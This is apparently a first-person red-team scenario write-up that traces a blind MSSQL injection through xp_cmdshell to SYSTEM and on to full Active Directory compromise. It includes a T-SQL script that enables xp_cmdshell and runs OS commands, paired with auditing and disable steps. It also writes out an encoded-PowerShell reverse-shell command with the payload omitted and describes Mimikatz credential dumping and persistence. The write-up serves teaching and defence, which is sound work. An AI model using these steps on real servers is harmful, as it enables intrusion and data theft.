S1P1

Scenario 1 - The Hidden Path to Domain Dominance

1. Initial Access:

I began with a standard phishing attack, which led to compromising a single host within the corporate network. The host was domain-joined, and after successfully obtaining standard user credentials, I started my enumeration. During this phase, I ran common tools like PowerView and BloodHound to explore the domain environment.

There wasn't much of immediate value, but I noticed a SQL Server instance running on one of the machines. This piqued my interest, because SQL Server is a common home for misconfigurations: mixed-mode authentication with weak SQL logins, dangerous extended procedures left enabled, and engines running as over-privileged domain accounts.

2. Discovering the MSSQL Injection Vulnerability:

I decided to investigate the application that interacted with the SQL Server. It was a web application with a search feature, and after inspecting its behavior I found that the search parameter was vulnerable to SQL injection. It was a blind injection: the page did not return query results directly, but the differences in responses and response times to true and false conditions showed that my input reached the backend database and could be exploited.

I spent some time exploiting this injection to extract information about the database and its users. During this testing I identified the service account running the MSSQL service and its Service Principal Name (SPN), MSSQLSvc/sqlserver.company.local (in practice the SPN also carries the port or instance name, e.g. :1433). This was an important lead: an SPN is an attribute of an Active Directory account, so it told me which domain account the engine ran as, and any domain account with an SPN can have a service ticket requested for it and cracked offline (Kerberoasting). A service account like this is also often granted more privilege than it needs.

3. Exploiting SQL Server for RCE:

Next, I found that the SQL Server instance was running with elevated privileges and that xp_cmdshell, a built-in extended stored procedure that executes arbitrary OS commands from within SQL Server, was enabled. xp_cmdshell is disabled by default, and calling it requires the sysadmin role (or an explicitly configured proxy account for lower-privileged logins), so the fact that I could use it through the injection meant the web application's database login was effectively sysadmin. With this, I was able to gain Remote Code Execution (RCE) on the server itself.

Using the SQL injection, I injected a stacked query that executed the xp_cmdshell procedure and ran the following command to spawn a reverse shell (the Base64-encoded PowerShell payload is omitted here):

EXEC xp_cmdshell 'powershell -e <base64-encoded PowerShell payload>';

This reverse shell connected back to my attacker machine. Commands launched through xp_cmdshell inherit the token of the SQL Server service account, and because this instance ran as LocalSystem I now had SYSTEM-level access to the server, with full control over the host running SQL Server.
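The database side of steps 2 and 3, collected into one T-SQL script as an added example (this is not code from the original engagement; the instance name, the audit file path and the assumption that the injected query already runs under a sysadmin login are mine). The first statements show how to confirm the service account behind the MSSQLSvc SPN and the caller's privilege level before touching xp_cmdshell; the last statements are the defender's counterpart: an Extended Events session that records every xp_cmdshell call, and the configuration change that turns the procedure back off.

```sql
-- Added example, not from the original writeup. Assumes the statements
-- arrive through a stacked-query injection point ('; <statement>; --)
-- whose database login is a member of sysadmin.

-- 1. Which Windows/domain account runs the Database Engine? Its SPN
--    (MSSQLSvc/<host>:<port>) is what the writeup found in AD. A domain
--    user here is Kerberoastable; LocalSystem here means xp_cmdshell = SYSTEM.
SELECT servicename, service_account, startup_type_desc
FROM   sys.dm_server_services
WHERE  servicename LIKE 'SQL Server (%';

-- 2. Privilege of the injected context. xp_cmdshell needs sysadmin unless
--    a proxy account (##xp_cmdshell_proxy_account##) has been configured.
SELECT SYSTEM_USER                  AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- 1 = sysadmin

-- 3. Is xp_cmdshell already enabled? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';

-- 4. If not, a sysadmin can enable it. 'show advanced options' must be on
--    first. Both changes are written to the SQL Server error log.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 5. Run an OS command. Output is returned as rows, so this reveals the
--    token the shell inherits: the service account from step 1
--    (NT AUTHORITY\SYSTEM, NT Service\MSSQLSERVER, or a domain account).
EXEC xp_cmdshell 'whoami /all';

-- 6. Defensive counterpart, part one: record every xp_cmdshell invocation
--    with the login and client host that issued it. rpc_completed covers
--    calls made via RPC, sql_statement_completed covers batch text.
--    The filename is an assumed path.
CREATE EVENT SESSION xp_cmdshell_audit ON SERVER
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.client_hostname, sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')),
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.client_hostname, sqlserver.server_principal_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%'))
ADD TARGET package0.event_file (SET filename = N'C:\XE\xp_cmdshell_audit.xel');
ALTER EVENT SESSION xp_cmdshell_audit ON SERVER STATE = START;

-- 7. Defensive counterpart, part two: disable the procedure and hide the knob.
--    Pair this with a non-sysadmin application login and a low-privilege
--    service account so step 4 is not possible from an injection point.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 3 is the quickest triage query during an assessment: if value_in_use is already 1 on an internet-facing application's database, the injection goes straight to step 5 with no configuration change to alert on. Step 2 is the check that decides whether step 4 is even possible from the injected context.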

4. Privilege Escalation to Domain Admin:

Now that I had RCE on the server, I explored the system further and found several credentials stored in memory and in configuration files. Among these were the credentials of a highly privileged service account used for SQL Server maintenance, which was a member of the Domain Admins group.

This account was also trusted for Kerberos delegation, meaning it could reuse the tickets of users who authenticated to it (or, with constrained delegation and protocol transition, request service tickets on behalf of arbitrary users) against other services on the network. With this credential I could access critical resources and escalate further.

5. Accessing the Domain Controller and Full Compromise:

Using the domain administrator credentials I obtained, I pivoted to the domain controller. There I used Mimikatz to extract the domain's credential material, obtaining the NTLM hashes of every domain account, including those of the other administrators, along with cleartext passwords for the accounts whose credentials were still resident in LSASS memory (cleartext is only recoverable for sessions cached on the host or accounts stored with reversible encryption, not for every account in the domain).

I then added my own account to the Domain Admins group, ensuring persistent access to the entire domain. This is a noisy step: a group-membership change on a protected group is logged on the domain controller (Security event 4728 for a global group), so a monitored environment would have caught it. With full control over the domain I could access sensitive data across the network, move laterally at will, and deploy persistence mechanisms.

6. Exfiltration and Final Control:

Now in full control of the domain, I exfiltrated sensitive data, including customer information and financial records, and created additional backdoors to maintain access.


Key Takeaways:

  • MSSQL Injection: A blind SQL injection point in the web application allowed me to interact with the database, identify the account running the SQL Server service, and find the Service Principal Name (SPN) registered for it.

  • Remote Code Execution (RCE): Because xp_cmdshell was enabled and the application's login was sysadmin, I gained Remote Code Execution on the server in the context of the SQL Server service account, which here was SYSTEM.

  • Privilege Escalation: The compromised service account had elevated privileges and delegation rights, allowing me to impersonate domain admins and escalate to full domain control.

  • Domain Compromise: Once I gained domain admin access, I had unrestricted access to all systems and sensitive data within the organization.
